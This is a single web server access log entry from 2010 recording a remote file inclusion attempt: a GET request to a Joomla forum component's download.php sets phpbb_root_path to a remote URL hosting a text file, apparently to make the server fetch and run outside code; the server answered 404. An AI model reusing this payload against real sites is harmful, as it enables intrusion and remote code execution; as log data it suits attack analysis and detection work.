200.93.147.154 - - [03/Mar/2010:10:38:40 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
